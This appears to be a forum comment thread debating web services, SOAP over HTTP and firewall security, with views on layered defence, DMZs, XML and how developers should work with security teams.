Good Security = Good Policies & Practices (Score:2, Insightful)
The problem is that certain things have to be open on a networked computer in order to benefit from the networking in the first place. You need layered security. You can't just secure your physical, network and transport layers and expect everything to be okay. You need to know what's going on all the way up to the application layer.
You need to use DMZs, staggered firewalls, SSL, SSH, applications that force you to login, appropriate file/directory/service security permissions. You need to know at any time what software your boxes are running, and make an effort to understand how that software works and what issues it presents. You need to patch commercial software, read the bug lists and do penetration testing.
There's obviously more that can be added to this list, but the point is that security is process not a technical specification, a device...or a choice of port.
Most organizations don't invest enough in this process because those controlling expenditure tend not to understand the importance. Also, security is one of those things you only notice when it doesn't work, so it is assumed you are doing it, and you'll never shine for doing a great job at it.
I think it will take a much more hostile Internet security environment to wake people up to the need to invest in the most critical security capital of all: talented, educated and dedicated human beings.
XML=impedance mismatch=bugs=holes (Score:2, Interesting)
XML may be a "standard" but so are technologies such as Java serialisation and they work just fine over HTTP. This works automatically and leads to fewer programming errors due to "impedance mismatch", surely the chief source of any security holes and other bugs.
I don't buy the argument that an XML schema is any more future-proof than a Java class spec. Java handles class changes etc. quite elegantly. And I don't buy the "XML is language-independent" line either - it's just hard to read XML in any language. So you have to use that awful Xerces stuff that changes every 2 months, with little backward compatibility between versions.
Don't be fooled - there is simply nothing that uses XML that can't be done more elegantly some other way. XML is not a technology - it, along with SOAP, is a completely pointless standard.
Apache is the new inetd (Score:5, Interesting)
A couple of rebuttals if I may.
Many people claim that one can run services on any port they choose, so port filtering is not the same thing as service filtering. True, but if people ran anything on any port we would have no concept of well-known-services at specific ports. Moving web traffic from port 80 makes almost no sense because that's where everyone is going to look for it by default. There is a high probability, then, that filtering on specific ports will filter specific services.
Network administrators, by default, are highly suspicious and paranoid people. They don't even trust the people they work with, and for good reason. If they could force everyone to use pine or mutt for e-mail reading, I'm sure they would since it is less succeptible to Outlook-born viruses. If development teams would communicate with and seek advice from the security team when developing applications I'm sure there wouldn't be as much hostility to opening a port as there is when approached with "We just wrote an application. Can we have a free port?"[1]. In the latter case, the security team has no idea what the application does or how it was developed and is certainly not inclined to open a port to untrusted software.
Finally, on to the subject of my article, Apache (or whatever server you're running) is the inetd of the future. Look at the facts:
Paradoxically, network admins appear less paranoid about their web servers than other inetd-based or standalone services. Some guy codes up a web app and, with little fuss, gets it deployed on the server. No code review, no hassle, no problem! There are only two reasons I can think of for this behavior: 1) The administrator inherently trusts the web server, or 2) the web server box is in a DMZ. I would be suspicious of administrators in the former case.
Despite the security advantages of a DMZ, it is still necessary for application developers to communicate with security people. Say, for example, that a web application is deployed on server in a DMZ and that the machine is later compromized. If the application had a configuration file with passwords for a database, the database should now be considered compromized. Damage can be reduced or prevented by correct configuration of the database (providing write access only to a specific table rather than the whole database), but you should check with the security people before actual deployment.[2]
[1] The standard answer to this question is "No". Note that the administrator only answers the question asked. If you want to be more successful in the future, present a full document detailing what the software does, how it works, and maybe provide the admin with a code review, THEN ask for a port. I know this is a lot of work, but it is necessary to maintain the security of the network. You may not take security seriously, but your administrator does.
[2] Yes, I know that there are moron security people out there. My comment assumes you have good to excellent security people working in your company.
Security policy MUST enable business, not inhibit (Score:3, Insightful)
It's not about the connection method, it's the content that traverses the corporate boundary that is the issue.
If the content shouldn't be going over the boundary, then it doesn't matter how you achieved it - you're still in the wrong. You could do it in CORBA, you could do it in simple HTTP GET and POSTs, it doesn't matter.
As a developer, I can make SOAP invisible to all firewall administrators using HTTPS or abusing their firewall's limitations (most firewalls are incredibly stupid - they don't and can't parse even basic protocols like HTTP, thus let anything that goes out on port X out if port X is allowed outbound.
As a person responsible for security, your use of any services not explicitly allowed is probably against security policy. But security policy is there to enable business, not inhibit it. This is the single biggest failing of most security people: they lose sight of why they are there!.
If it takes too long to get a content-flow approved, then that is a failing of the content-flow negotiation process, and it's not about technology at all.